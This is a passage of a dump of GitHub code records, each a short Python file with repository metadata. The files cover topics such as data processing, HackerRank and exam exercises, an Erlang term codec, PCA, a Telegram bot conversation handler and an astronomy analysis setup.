\"MIT\"\n\n\nimport numpy\nimport os\n\n\ndef solution(file_path):\n \"\"\"Solution to the io notebook exercise\"\"\"\n raw_data = load_data(file_path)\n proc_data, mask = process_data(data=raw_data)\n save_data(mask=mask, proc_data=proc_data, raw_data=raw_data,\n output_file='process.h5')\n list_root('process.h5')\n return raw_data, proc_data, mask\n\n\ndef load_data(file_path):\n \"\"\"load data contained in data/medipix.edf\"\"\"\n import fabio\n data = fabio.open(file_path).data\n return data\n\n\ndef process_data(data):\n \"\"\"\n Process the data The goal of the processing is to clamp the pixels values\n to a new range of values ([10%, 90%] of the existing one). To do so:\n\n * Create a mask to detect pixel which are below 10% \n * With the above mask, set the affected pixels to the 10% 'low value'.\n * do the same for value above 90%\n * create the mask of all the modify pixel\n\n \"\"\"\n maxi = data.max()\n mini = data.min()\n \n val_10 = 0.9*mini + 0.1*maxi\n val_90 = 0.1*mini + 0.9*maxi\n mask_10 = (data <= val_10)\n mask_90 = (data >= val_90)\n mask = numpy.logical_or(mask_10, mask_90)\n\n proc_data = numpy.copy(data)\n proc_data[mask_10] = val_10\n proc_data[mask_90] = val_90\n return proc_data, mask\n\n\ndef save_data(mask, proc_data, raw_data, output_file):\n \"\"\"\n save mask, proc_data and raw_data into output_file\n \"\"\"\n import h5py\n with h5py.File(output_file, \"w\") as h5_file:\n h5_file['/mask'] = mask\n h5_file['/result'] = proc_data\n h5_file['/raw'] = raw_data\n\n\ndef list_root(file_path):\n \"\"\"List dataset / group contained at the root level\"\"\"\n import h5py\n assert os.path.exists(file_path)\n h5_file = h5py.File(file_path)\n print('root level:')\n print(list(h5_file['/'].keys()))\n","repo_name":"aicampbell/silx-training","sub_path":"python/io/exercicesolution.py","file_name":"exercicesolution.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"74237039306","text":"from models.User.UserModel import UserModel\n\nclass UserConfirmCRUD():\n \n @classmethod\n def update_acc_verified(cls, token):\n active = UserModel.activate_account(token)\n if active:\n return { \"status\": 200,\n \"message\": \"Account has been Activated successfully\"\n }\n else:\n return { \"status\": 401,\n \"message\": \"failed the Activation\"\n 
}","repo_name":"Al-Alloush/Python-WebAPI","sub_path":"web_api/controllers/User/userConfirm_crud.py","file_name":"userConfirm_crud.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5365317383","text":"def bekeres_nev():\n neve = input('Adja meg a nevét:')\n return neve\n\ndef bekeres_szulev():\n szulev = input('Adja meg a születési évét:')\n return szulev\n\n\nnev = \"unknown\"\nwhile nev != \"\":\n nev = bekeres_nev()\n print(nev)\n if nev != \"\":\n print(bekeres_szulev())\n","repo_name":"benneleszek/python-2022-02-28","sub_path":"bekeresek.py","file_name":"bekeresek.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18094322064","text":"#Stephanie Bravo\n#April 3, 2019\n#This program will creates a map with markers for all the traffic collisions from the input file.\n\nimport folium\nimport pandas as pd\n\n#Ask for the CSV file\n\ncuny= pd.read_csv(input(\"Enter CSV file name:\"))\noutputfile = input(\"Enter output file:\")\n\n#Create a map, centered around hunter\nmapCUNY = folium.Map(location=[40.75, -74.125])\nfor index,row in cuny.iterrows():\n lat= row[\"LATITUDE\"]\n lon= row[\"LONGITUDE\"]\n newMarker = folium.Marker([lat,lon])\n newMarker.add_to(mapCUNY)\n\n#Save the map:\nmapCUNY.save(outfile = outputfile)\n\n\n# columns names are \"LATITUDE\" and \"LONGITUDE\"\n\n#\"TIME\") to label each marker and changed\n#the underlying map with the option: tiles=\"Cartodb Positron\" when creating the map.)\n","repo_name":"stephanieb00/CSCI127","sub_path":"Python Work/Lab 9/Assignment43.py","file_name":"Assignment43.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31340869466","text":"import math as m\n\nnum = int(input('\\nEntre com um número de 3 dígitos: '))\nc = num // 100\nd = num % 100 // 10\nu = num % 10\nnum1 = u*100 + d*10 + c\nprint(f'\\nNumero: {num} ')\nprint(f'\\nInvertido: {int(num1)} ')\nprint('\\n')\n","repo_name":"ElbertJean/faculdade","sub_path":"1-Semestre/Algoritmos/Lista04-10Set/exercicio_47.py","file_name":"exercicio_47.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"44771143607","text":"'''\nHackerLand University has the following grading policy:\n\nEvery student receives a in the inclusive range from to .\nAny less than is a failing grade.\nSam is a professor at the university and likes to round each student's according to these rules:\n\nIf the difference between the and the next multiple of is less than , round up to the next multiple of .\nIf the value of is less than , no rounding occurs as the result will still be a failing grade.\n'''\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'gradingStudents' function below.\n#\n# The function is expected to return an INTEGER_ARRAY.\n# The function accepts INTEGER_ARRAY grades as parameter.\n#\n\ndef gradingStudents(grades):\n for id,val in enumerate(grades):\n if val >= 38:\n rem = val % 5\n div = val // 5\n\n if rem != 0 and rem > 2:\n val += 5 - rem\n grades[id] = val\n \n return grades\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n grades_count = int(input().strip())\n\n grades = []\n\n for _ in range(grades_count):\n 
grades_item = int(input().strip())\n grades.append(grades_item)\n\n result = gradingStudents(grades)\n\n fptr.write('\\n'.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"ssingh2409/codingPractise","sub_path":"HackerRank/Problem_Solving/Grading Students.py","file_name":"Grading Students.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1648552624","text":"\nfrom __future__ import division\n\nimport struct\nimport zlib\n\nfrom erlastic.constants import *\nfrom erlastic.types import *\n\n__all__ = [\"ErlangTermEncoder\", \"ErlangTermDecoder\", \"EncodingError\"]\n\nclass EncodingError(Exception):\n pass\n\nclass ErlangTermDecoder(object):\n def __init__(self, encoding=None):\n self.encoding = encoding\n # Cache decode functions to avoid having to do a getattr\n self.decoders = {}\n for k in self.__class__.__dict__:\n v = getattr(self, k)\n if callable(v) and k.startswith('decode_'):\n self.decoders[k.split('_')[1]] = v\n\n def decode(self, bytes, offset=0):\n version = ord(bytes[offset])\n if version != FORMAT_VERSION:\n raise EncodingError(\"Bad version number. Expected %d found %d\" % (FORMAT_VERSION, version))\n return self.decode_part(bytes, offset+1)[0]\n\n def decode_part(self, bytes, offset=0):\n return self.decoders[bytes[offset]](bytes, offset+1)\n\n def decode_a(self, bytes, offset):\n \"\"\"SMALL_INTEGER_EXT\"\"\"\n return ord(bytes[offset]), offset+1\n\n def decode_b(self, bytes, offset):\n \"\"\"INTEGER_EXT\"\"\"\n return struct.unpack(\">l\", bytes[offset:offset+4])[0], offset+4\n\n def decode_c(self, bytes, offset):\n \"\"\"FLOAT_EXT\"\"\"\n return float(bytes[offset:offset+31].split('\\x00', 1)[0]), offset+31\n\n def decode_F(self, bytes, offset):\n \"\"\"NEW_FLOAT_EXT\"\"\"\n return struct.unpack(\">d\", bytes[offset:offset+8])[0], offset+8\n\n def decode_d(self, bytes, offset):\n \"\"\"ATOM_EXT\"\"\"\n atom_len = struct.unpack(\">H\", bytes[offset:offset+2])[0]\n atom = bytes[offset+2:offset+2+atom_len]\n return self.convert_atom(atom), offset+atom_len+2\n\n def decode_s(self, bytes, offset):\n \"\"\"SMALL_ATOM_EXT\"\"\"\n atom_len = ord(bytes[offset])\n atom = bytes[offset+1:offset+1+atom_len]\n return self.convert_atom(atom), offset+atom_len+1\n\n def decode_h(self, bytes, offset):\n \"\"\"SMALL_TUPLE_EXT\"\"\"\n arity = ord(bytes[offset])\n offset += 1\n\n items = []\n for i in range(arity):\n val, offset = self.decode_part(bytes, offset)\n items.append(val)\n return tuple(items), offset\n\n def decode_i(self, bytes, offset):\n \"\"\"LARGE_TUPLE_EXT\"\"\"\n arity = struct.unpack(\">L\", bytes[offset:offset+4])[0]\n offset += 4\n\n items = []\n for i in range(arity):\n val, offset = self.decode_part(bytes, offset)\n items.append(val)\n return tuple(items), offset\n\n def decode_j(self, bytes, offset):\n \"\"\"NIL_EXT\"\"\"\n return [], offset\n\n def decode_k(self, bytes, offset):\n \"\"\"STRING_EXT\"\"\"\n length = struct.unpack(\">H\", bytes[offset:offset+2])[0]\n st = bytes[offset+2:offset+2+length]\n if self.encoding:\n try:\n st = st.decode(self.encoding)\n except UnicodeError:\n st = [ord(x) for x in st]\n else:\n st = [ord(x) for x in st]\n return st, offset+2+length\n\n def decode_l(self, bytes, offset):\n \"\"\"LIST_EXT\"\"\"\n length = struct.unpack(\">L\", bytes[offset:offset+4])[0]\n offset += 4\n items = []\n for i in range(length):\n val, offset = self.decode_part(bytes, offset)\n items.append(val)\n tail, offset = 
self.decode_part(bytes, offset)\n if tail != []:\n # TODO: Not sure what to do with the tail\n raise NotImplementedError(\"Lists with non empty tails are not supported\")\n return items, offset\n\n def decode_m(self, bytes, offset):\n \"\"\"BINARY_EXT\"\"\"\n length = struct.unpack(\">L\", bytes[offset:offset+4])[0]\n return bytes[offset+4:offset+4+length], offset+4+length\n\n def decode_n(self, bytes, offset):\n \"\"\"SMALL_BIG_EXT\"\"\"\n n = ord(bytes[offset])\n offset += 1\n return self.decode_bigint(n, bytes, offset)\n\n def decode_o(self, bytes, offset):\n \"\"\"LARGE_BIG_EXT\"\"\"\n n = struct.unpack(\">L\", bytes[offset:offset+4])[0]\n offset += 4\n return self.decode_bigint(n, bytes, offset)\n\n def decode_bigint(self, n, bytes, offset):\n sign = ord(bytes[offset])\n offset += 1\n b = 1\n val = 0\n for i in range(n):\n val += ord(bytes[offset]) * b\n b <<= 8\n offset += 1\n if sign != 0:\n val = -val\n return val, offset\n\n def decode_e(self, bytes, offset):\n \"\"\"REFERENCE_EXT\"\"\"\n node, offset = self.decode_part(bytes, offset)\n if not isinstance(node, Atom):\n raise EncodingError(\"Expected atom while parsing REFERENCE_EXT, found %r instead\" % node)\n reference_id, creation = struct.unpack(\">LB\", bytes[offset:offset+5])\n return Reference(node, [reference_id], creation), offset+5\n\n def decode_r(self, bytes, offset):\n \"\"\"NEW_REFERENCE_EXT\"\"\"\n id_len = struct.unpack(\">H\", bytes[offset:offset+2])[0]\n node, offset = self.decode_part(bytes, offset+2)\n if not isinstance(node, Atom):\n raise EncodingError(\"Expected atom while parsing NEW_REFERENCE_EXT, found %r instead\" % node)\n creation = ord(bytes[offset])\n reference_id = struct.unpack(\">%dL\" % id_len, bytes[offset+1:offset+1+4*id_len])\n return Reference(node, reference_id, creation), offset+1+4*id_len\n\n def decode_f(self, bytes, offset):\n \"\"\"PORT_EXT\"\"\"\n node, offset = self.decode_part(bytes, offset)\n if not isinstance(node, Atom):\n raise EncodingError(\"Expected atom while parsing PORT_EXT, found %r instead\" % node)\n port_id, creation = struct.unpack(\">LB\", bytes[offset:offset+5])\n return Port(node, port_id, creation), offset+5\n\n def decode_g(self, bytes, offset):\n \"\"\"PID_EXT\"\"\"\n node, offset = self.decode_part(bytes, offset)\n if not isinstance(node, Atom):\n raise EncodingError(\"Expected atom while parsing PID_EXT, found %r instead\" % node)\n pid_id, serial, creation = struct.unpack(\">LLB\", bytes[offset:offset+9])\n return PID(node, pid_id, serial, creation), offset+9\n\n def decode_q(self, bytes, offset):\n \"\"\"EXPORT_EXT\"\"\"\n module, offset = self.decode_part(bytes, offset)\n if not isinstance(module, Atom):\n raise EncodingError(\"Expected atom while parsing EXPORT_EXT, found %r instead\" % module)\n function, offset = self.decode_part(bytes, offset)\n if not isinstance(function, Atom):\n raise EncodingError(\"Expected atom while parsing EXPORT_EXT, found %r instead\" % function)\n arity, offset = self.decode_part(bytes, offset)\n if not isinstance(arity, int):\n raise EncodingError(\"Expected integer while parsing EXPORT_EXT, found %r instead\" % arity)\n return Export(module, function, arity), offset+1\n\n def decode_P(self, bytes, offset):\n \"\"\"Compressed term\"\"\"\n usize = struct.unpack(\">L\", bytes[offset:offset+4])[0]\n bytes = zlib.decompress(bytes[offset+4:offset+4+usize])\n return self.decode_part(bytes, 0)\n\n def convert_atom(self, atom):\n if atom == \"true\":\n return True\n elif atom == \"false\":\n return False\n elif atom == \"none\":\n 
return None\n return Atom(atom)\n\nclass ErlangTermEncoder(object):\n def __init__(self, encoding=\"utf-8\", unicode_type=\"binary\"):\n self.encoding = encoding\n self.unicode_type = unicode_type\n\n def encode(self, obj, compressed=False):\n ubytes = \"\".join(self.encode_part(obj))\n if compressed is True:\n compressed = 6\n if not (compressed is False \\\n or (isinstance(compressed, (int, long)) \\\n and compressed >= 0 and compressed <= 9)):\n raise TypeError(\"compressed must be True, False or \"\n \"an integer between 0 and 9\")\n if compressed:\n cbytes = zlib.compress(ubytes, compressed)\n if len(cbytes) < len(ubytes):\n usize = struct.pack(\">L\", len(ubytes))\n ubytes = \"\".join([COMPRESSED, usize, cbytes])\n return chr(FORMAT_VERSION) + ubytes\n\n def encode_part(self, obj):\n if obj is False:\n return [ATOM_EXT, struct.pack(\">H\", 5), \"false\"]\n elif obj is True:\n return [ATOM_EXT, struct.pack(\">H\", 4), \"true\"]\n elif obj is None:\n return [ATOM_EXT, struct.pack(\">H\", 4), \"none\"]\n elif isinstance(obj, (int, long)):\n if 0 <= obj <= 255:\n return [SMALL_INTEGER_EXT, chr(obj)]\n elif -2147483648 <= obj <= 2147483647:\n return [INTEGER_EXT, struct.pack(\">l\", obj)]\n else:\n sign = chr(obj < 0)\n obj = abs(obj)\n\n big_bytes = []\n while obj > 0:\n big_bytes.append(chr(obj & 0xff))\n obj >>= 8\n\n if len(big_bytes) < 256:\n return [SMALL_BIG_EXT, chr(len(big_bytes)), sign] + big_bytes\n else:\n return [LARGE_BIG_EXT, struct.pack(\">L\", len(big_bytes)), sign] + big_bytes\n elif isinstance(obj, float):\n floatstr = \"%.20e\" % obj\n return [FLOAT_EXT, floatstr + \"\\x00\"*(31-len(floatstr))]\n elif isinstance(obj, Atom):\n return [ATOM_EXT, struct.pack(\">H\", len(obj)), obj]\n elif isinstance(obj, str):\n return [BINARY_EXT, struct.pack(\">L\", len(obj)), obj]\n elif isinstance(obj, unicode):\n return self.encode_unicode(obj)\n elif isinstance(obj, tuple):\n n = len(obj)\n if n < 256:\n bytes = [SMALL_TUPLE_EXT, chr(n)]\n else:\n bytes = [LARGE_TUPLE_EXT, struct.pack(\">L\", n)]\n for item in obj:\n bytes += self.encode_part(item)\n return bytes\n elif obj == []:\n return [NIL_EXT]\n elif isinstance(obj, list):\n bytes = [LIST_EXT, struct.pack(\">L\", len(obj))]\n for item in obj:\n bytes += self.encode_part(item)\n bytes.append(NIL_EXT) # list tail - no such thing in Python\n return bytes\n elif isinstance(obj, Reference):\n return [NEW_REFERENCE_EXT,\n struct.pack(\">H\", len(obj.ref_id)),\n ATOM_EXT, struct.pack(\">H\", len(obj.node)), obj.node,\n chr(obj.creation), struct.pack(\">%dL\" % len(obj.ref_id), *obj.ref_id)]\n elif isinstance(obj, Port):\n return [PORT_EXT,\n ATOM_EXT, struct.pack(\">H\", len(obj.node)), obj.node,\n struct.pack(\">LB\", obj.port_id, obj.creation)]\n elif isinstance(obj, PID):\n return [PID_EXT,\n ATOM_EXT, struct.pack(\">H\", len(obj.node)), obj.node,\n struct.pack(\">LLB\", obj.pid_id, obj.serial, obj.creation)]\n elif isinstance(obj, Export):\n return [EXPORT_EXT,\n ATOM_EXT, struct.pack(\">H\", len(obj.module)), obj.module,\n ATOM_EXT, struct.pack(\">H\", len(obj.function)), obj.function,\n SMALL_INTEGER_EXT, chr(obj.arity)]\n else:\n raise NotImplementedError(\"Unable to serialize %r\" % obj)\n\n def encode_unicode(self, obj):\n if not self.encoding:\n return self.encode_part([ord(x) for x in obj])\n else:\n st = obj.encode(self.encoding)\n if self.unicode_type == \"binary\":\n return [BINARY_EXT, struct.pack(\">L\", len(st)), st]\n elif self.unicode_type == \"str\":\n return [STRING_EXT, struct.pack(\">H\", len(st)), st]\n 
else:\n raise TypeError(\"Unknown unicode encoding type %s\" % self.unicode_type)\n","repo_name":"dizengrong/my_code","sub_path":"python-erlastic/erlastic/codec.py","file_name":"codec.py","file_ext":"py","file_size_in_byte":11982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"22399887643","text":"n=eval(input(\"Enter the places till you want to add\"))\r\nx=[]\r\nfor i in range(n):\r\n x.append(input(\"Enter %d digit\"%i))\r\n print(x)\r\n \r\nprint(x[::-1])\r\nsum = []\r\ncarry = 0\r\ni=1\r\nfor i in range(n,0,-1):\r\n\tcarry+=int(x[-i])\r\n\tsum.append(str(carry%10))\r\n\tcarry //=10\r\n\r\nwhile carry>0:\r\n\tsum.append(str(carry%10))\r\n\tcarry=carry//10\r\nsum=sum[::-1]\r\nsum=\"\".join(sum)\r\nsum=int(sum)\r\nprint(sum)\r\n","repo_name":"sameerimamillapalli/VEDIC-ADDITION","sub_path":"add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15754764459","text":"\"\"\"\nProject Name: \tDCroSS\nAuthor List: \tPriya Pathak\nFilename: \t\tconversation_handler.py\nDescription: \tThe conversation_handler decides the flow of the conversation\n It uses ptb's ConversationHandler to define states, entry points, and a fallback.\n All the states and the methods associated with them return an integer to the\n conversation handler which then uses it to determine the next state to go to and then calls\n the functions associated with the next state.\n\"\"\"\n\n\nfrom telegram.ext import CommandHandler, MessageHandler, Filters, CallbackQueryHandler\nfrom state_handlers import *\n\n# Conversation states\n# These are imported from state_handlers, specifying here for convenience\n# CHOICE_LANGUAGE, CHOICE_START, ASK_PHONE, ASK_DISASTER, ASK_LOCATION, HANDLE_REPORT = range(6)\n\n# start_filters = Filters.text([\"Hi\", \"Hello\", \"Need help\"])\nchange_language_filters = Filters.regex(\"language\")\n\nconversation_handler = ConversationHandler(\n entry_points=[\n CommandHandler('start', ask_language),\n MessageHandler(change_language_filters, update_language),\n MessageHandler(Filters.text, ask_language),\n MessageHandler(Filters.photo, handle_images)\n ],\n states={\n CHOICE_LANGUAGE: [\n CallbackQueryHandler(start, pattern=\"^lang_(.*)$\")\n ],\n CHOICE_START: [\n CallbackQueryHandler(ask_phone, pattern=\"^report$\"),\n CallbackQueryHandler(cancel, pattern=\"^goto_webapp$\"),\n CallbackQueryHandler(cancel, pattern=\"^cancel$\")\n ],\n ASK_LOCATION: [\n MessageHandler(Filters.contact, ask_location)\n ],\n ASK_DISASTER: [\n MessageHandler(Filters.location, ask_disaster)\n ],\n HANDLE_REPORT: [\n CallbackQueryHandler(handle_earthquake_report, pattern=\"^earthquake$\"),\n CallbackQueryHandler(handle_water_logging_report, pattern=\"^water_logging$\"),\n CallbackQueryHandler(cancel, pattern=\"^cancel$\")\n ],\n DESCRIBE: [\n MessageHandler(Filters.text, catch_description),\n CallbackQueryHandler(skip_description, pattern=\"^no_description$\")\n ],\n UPDATE_LANG: [\n CallbackQueryHandler(catch_update_language, pattern=\"^lang_(.*)\")\n ],\n IMAGE: [\n CallbackQueryHandler(skip_image, pattern=\"^no_image$\"),\n MessageHandler(Filters.photo, handle_images)\n ]\n },\n fallbacks=[\n CommandHandler(\"cancel\", cancel)\n 
]\n)\n","repo_name":"DCroSSLab/dcross-telegram-bot","sub_path":"conversation_handler.py","file_name":"conversation_handler.py","file_ext":"py","file_size_in_byte":2552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19184291121","text":"\"\"\"\nINF 552 - Homework 3 - Minh Tran\nPCA\n\"\"\"\n\n'''\npython pcaMT.py pca-data.txt 2 pca-mt.txt\n'''\n\n# Imports\nfrom collections import namedtuple\nfrom numpy import genfromtxt, linalg, dot, sqrt\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D #<--- This is important for 3d plotting\n\n\"\"\"\nPCA algorithm:\nPerforms principal component on x, a matrix with observations in the rows.\n\"\"\"\n\n\"\"\"\nThe transpose trick says that if v is an eigenvector of M^T M, then M^T v is an eigenvector of MM^T.\nWe arbitrarily select \"100\" as the switching threshold. Another approach is to switch by comparing numPts and numDims.\n\"\"\"\n\nPC = namedtuple('PC', ['idx', 'eigVal', 'eigVec'])\ndef pca(x, targetDims):\n # Subtract the mean of dimension i from column i, in order to center the matrix.\n x = (x - x.mean(axis=0))\n\n # extract the number of data points and number of dimensions\n numPts, numDims = x.shape\n\n \"\"\"\n Returns the projection matrix (the eigenvectors of x^T x, ordered with largest eigenvectors first) and the eigenvalues (ordered from largest to smallest).\n \"\"\"\n if numDims >= 100:\n # get eigenvalues and eigenvectors of x*x.T, here eigenvalues are in ascending order\n eigenvalues, eigenvectors = linalg.eigh(dot(x, x.T))\n\n # print(\"eigenvalues: \", eigenvalues)\n\n # obtain the actual eigenvectors of x.T*x using transpose trick\n v = (dot(x.T, eigenvectors).T)[::-1] # Unscaled and reversing order, but the relative order is still correct.\n\n # obtain the eigenvalues in descending order:\n s = sqrt(eigenvalues)[::-1] # Unscaled, but the relative order is still correct.\n # print(\"s: \", s)\n else:\n u, s, v = linalg.svd(x, full_matrices=False)\n\n # print(\"s: \", s)\n # print(\"v: \", v)\n\n # extract the needed components:enumerate to maintain the count\n principalComps = sorted(enumerate(s), key=lambda x: x[1], reverse=True)[:targetDims]\n # print(\"principalComps: \", principalComps)\n\n return [PC(idx, eigVal, v[idx]) for (idx, eigVal) in principalComps]\n # return v, s\n\ndef PCAtransform(old, PCs):\n # extract matrix consisting of eigenvectors\n eigVecMat = np.asarray([pc.eigVec for pc in PCs])\n\n return eigVecMat.dot(old)\n\nif __name__ == '__main__':\n USAGE = 'USAGE: python pcaSKLearnMT.py pca-data.txt 2 pca-sklearn-mt.txt'\n if len(sys.argv) != 4:\n print(USAGE)\n sys.exit(1)\n else:\n inFile = sys.argv[1] # input file\n numDims = int(sys.argv[2]) # desired number of dimension after pca\n outFile = sys.argv[3] # output file\n\n # import data\n inputData = genfromtxt(inFile, delimiter='\\t')\n # print(\"inputData: \", np.size(inputData,1))\n\n # plot data\n if np.size(inputData, 1) == 3:\n fig = plt.figure()\n ax = plt.axes(projection='3d')\n ax.scatter3D(inputData[:, 0], inputData[:, 1], inputData[:, 2])\n plt.show(block=False)\n plt.pause(1)\n plt.savefig('3dData.png')\n plt.close()\n\n if np.size(inputData, 1) < numDims:\n raise ValueError('Cannot perform PCA because desired dimension is greater than original dimension')\n\n # principalComps = decomposeComponents(inputData, numDims)\n principalComps = pca(inputData, numDims)\n\n for count, eigVal, eigVec in principalComps:\n print('Principal 
Component Vector {0}: {1} with eigenvalue: {2}'.format(count, eigVec, eigVal))\n\n # np.set_printoptions(suppress=True)\n with open(outFile, 'w') as file:\n for old in inputData:\n transformedData = PCAtransform(old, principalComps)\n file.write('PCA: {0} -> {1}'.format(old, transformedData))\n file.write('\\n')","repo_name":"trademark152/Machine_Learning_For_Data_Science_INF552_USC","sub_path":"hw3_pca_fastmap/pcaMT.py","file_name":"pcaMT.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"72843544891","text":"\nfor x in range(99, 1000):\n N = bin(x)[2::]\n for i in range(3):\n cal_1 = str(N).count(\"1\")\n cal_0 = str(N).count(\"0\")\n if cal_1 == cal_0:\n N = str(N) + str(N)[-1]\n elif cal_0 < cal_1:\n N = str(N) + \"0\"\n else:\n N = str(N) + \"1\"\n if int(N, 2) % 4 == 0:\n print(x)\n break","repo_name":"knage9/school_ege","sub_path":"school/ЕГЭ/ege/5.2.py","file_name":"5.2.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8739083125","text":"\"\"\"\nSet up an ROI factory object\n\n$Header: /nfs/slac/g/glast/ground/cvs/pointlike/python/uw/like2/Attic/roisetup.py,v 1.35 2013/10/13 13:55:58 burnett Exp $\n\n\"\"\"\nimport os, sys, types\nimport numpy as np\nimport pandas as pd\nimport skymaps\nfrom . import dataset, skymodel, diffuse , roi_bands\nfrom .. utilities import keyword_options, convolution\nfrom .. like import roi_extended, pypsf, pycaldb, pointspec2 #, roi_bands\nfrom .. data import dataman\n\n \nclass ExposureManager(object):\n \"\"\"A small class to handle the trivial combination of effective area and livetime.\n \n Also handles an ad-hoc exposure correction\n \"\"\"\n\n def __init__(self, dataset, **datadict): \n \"\"\"\n Parameters\n ----------\n dataset : DataSet object\n for CALDB, aeff, some parameters\n \n datadict['exposure-correction'] : list of strings defining functions of energy\n the correction factors to apply to front, back \n \"\"\"\n\n def make_exposure():\n if dataset.exposure_cube is not None:\n ## use pregenerated gtexpcube2 cube; turn off interpolation\n return [skymaps.DiffuseFunction(f,1000.,False) for f in dataset.exposure_cube]\n \n skymaps.EffectiveArea.set_CALDB(dataset.CALDBManager.CALDB)\n skymaps.Exposure.set_cutoff(np.cos(np.radians(dataset.thetacut)))\n inst = ['front', 'back']\n aeff_files = dataset.CALDBManager.get_aeff()\n ok = [os.path.exists(file) for file in aeff_files]\n if not all(ok):\n raise DataSetError('one of CALDB aeff files not found: %s' %aeff_files)\n self.ea = [skymaps.EffectiveArea('', file) for file in aeff_files]\n if dataset.verbose: print (' -->effective areas at 1 GeV: ', \\\n ['%s: %6.1f'% (inst[i],self.ea[i](1000)) for i in range(len(inst))])\n \n if dataset.use_weighted_livetime and hasattr(dataset, 'weighted_lt'):\n return [skymaps.Exposure(dataset.lt,dataset.weighted_lt,ea) for ea in self.ea]\n else:\n return [skymaps.Exposure(dataset.lt,ea) for ea in self.ea]\n \n self.exposure = make_exposure()\n\n correction = datadict.pop('exposure_correction', None)\n if correction is not None:\n self.correction = map(eval, correction)\n energies = [100, 1000, 10000]\n if not self.quiet: 'Exposure correction: for energies %s ' % energies\n for i,f in enumerate(self.correction):\n if not self.quiet: ('\\tfront:','\\tback: ','\\tdfront:', '\\tdback')[i], map( f , energies)\n else:\n self.correction = lambda x: 1.0, lambda 
x: 1.0\n iem_correction = datadict.pop('iem_correction', None)\n if iem_correction is not None:\n self.correction.append( eval(iem_correction))\n self.correction.append( eval(iem_correction))\n energies = [133, 237, 421, 749, 1.333]\n if not self.quiet: 'Diffuse correction: for energies %s ' % energies\n for i,f in enumerate(self.correction[3:]):\n if not self.quiet: ('\\tfront: ','\\tback: ',)[i], map( f , energies)\n self.systematic = datadict.pop('systematic', None)\n if self.systematic is not None:\n if not self.quiet: 'Galactic diffuse systematic uncertainty: %f' % self.systematic\n \n def value(self, sdir, energy, event_class):\n return self.exposure[event_class].value(sdir, energy)*self.correction[event_class](energy)\n \nclass ExposureCorrection(object):\n \"\"\" logarithmic interpolation function\n \"\"\"\n def __init__(self, a,b, ea=100, eb=300):\n self.c = (b-a)/np.log(eb/ea)\n self.d = a -self.c*np.log(ea)\n self.a, self.b = a,b\n self.ea,self.eb = ea,eb\n def __call__(self, e):\n if e>self.eb: return self.b\n if e=len(self.vals): return 1.0\n# return self.vals[int(loc)]\n\n\nclass ROIfactory(object):\n \"\"\"\n combine the dataset and skymodel for an ROI\n \n \"\"\"\n defaults =(\n ('analysis_kw', dict(irf=None,minROI=5,maxROI=5, emin=100, emax=316277, quiet=False),'roi analysis keywords'),\n ('skymodel_kw', {}, 'skymodel keywords'),\n ('convolve_kw', dict( resolution=0.125, # applied to OTF convolution: if zero, skip convolution\n pixelsize=0.05, # ExtendedSourceConvolution\n num_points=25), # AnalyticConvolution\n 'convolution parameters'),\n ('irf', None, 'Set to override saved value with the skymodel: expect to find in custom_irf_dir'),\n ('extended', None, 'Set to override saved value with skymodel'),\n #('selector', skymodel.HEALPixSourceSelector,' factory of SourceSelector objects'),\n ('data_interval', 0, 'Data interval (e.g., month) to use'),\n ('nocreate', True, 'Do not allow creation of a binned photon file'),\n #('galactic_correction', None, 'Name of file with diffuse correction factors'), \n #('galactic_systematic', None, 'Systematic uncertainty for the galactic counts'), \n ('quiet', False, 'set to suppress most output'),\n )\n\n @keyword_options.decorate(defaults)\n def __init__(self, modeldir, dataspec=None, **kwargs):\n \"\"\" \n parameters\n ----------\n modeldir: folder containing skymodel definition\n dataspec : string or dict or None\n used to look up data specification\n if string, equivalent to dict(dataname=dataspec); otherwise the dict must have\n a dataname element\n if None, use the data used to generate the skymodel\n \"\"\"\n keyword_options.process(self, kwargs)\n self.analysis_kw['quiet']=self.quiet\n if not self.quiet: 'ROIfactory setup: \\n\\tskymodel: ', modeldir\n # extract parameters used by skymodel for defaults\n input_config = eval(open(os.path.expandvars(modeldir+'/config.txt')).read())\n for key in 'extended irf'.split():\n if self.__dict__[key] is None or self.__dict__[key]=='None': \n #print ('%s: %s replace from skymodel: \"%s\"' %(key, kwargs.get(key,None), input_config.get(key,None)))\n self.__dict__[key]=input_config.get(key, None)\n\n # check for skymodel_kw in the config,txt file, use if found\n config_skymodel = input_config.get('skymodel_config', None)\n if config_skymodel is not None:\n self.skymodel_kw.update(config_skymodel)\n if not self.quiet: 'Using skymodel config: %s' % self.skymodel_kw\n \n self.skymodel = skymodel.SkyModel(modeldir, **self.skymodel_kw)\n\n if isinstance(dataspec,dataman.DataSet):\n self.dataset = 
